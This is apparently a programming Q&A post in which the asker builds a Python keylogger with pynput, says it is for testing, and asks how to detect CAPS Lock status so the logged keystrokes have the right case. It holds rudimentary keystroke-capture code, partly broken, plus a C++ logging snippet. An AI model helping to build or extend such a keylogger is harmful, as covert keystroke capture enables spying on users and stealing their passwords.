# Keylogger: Detecting CAPS Lock key status

Tags: python, keyboard, keylogger

I am creating a **keylogger** in python for testing, and it occurred to me the following issue / question:

"I need to check if **CAPS Lock** is active or inactive, and thus generate this difference in the user keylog, but how to do it?". In **C++** I know I could change the key in **ASCII** to convert the key to uppercase / lowercase:

---

```cpp
//Ex.:

if (! isCapsON) {//
     appendKeyLog (key, hostName); // Caps by default when caps is not active
} else {
     appendKeyLog ((byte) (key + 32), hostName) // Uppercase char + 32 � lowercase in ascii
}
```

---

I thought of simulating a random key on the user keyboard and checking the value in **ASCII** to detect if the **CAPS** key is active or not, and then setting `isCaps = True / False`. However, I have no idea how I could accomplish this, and when searching on, I just found ways to detect for linux, using subproccess and other python libs.

PS.: I'm using Debian Stretch, but I want to support any OS (or the most used ones)

Currently, to capture the keys I am using the pynput library as follows:

```
import pynput
from pynput.keyboard import Key, Listener

def key_key (key):

     format_key = str (key) #Convert key to string

     if key == Key.enter:
         write_logs ("\ n")

     elif key == Key.esc:
         write_logs ("[Esc]")

     else:
         write_logs (format_key [2]) #Capture only the value between single quotation marks (generated value is u '[keypress]')

#Initialize Keylogger
with Listener (on_press = catch_key) as listen:
     listen.join ()
```

Comment: Are you on windows?

Comment: Linux, but I want to support any OS (or the most used)

Comment: On windows use: https://stackoverflow.com/questions/34028478/python-3-detect-caps-lock-status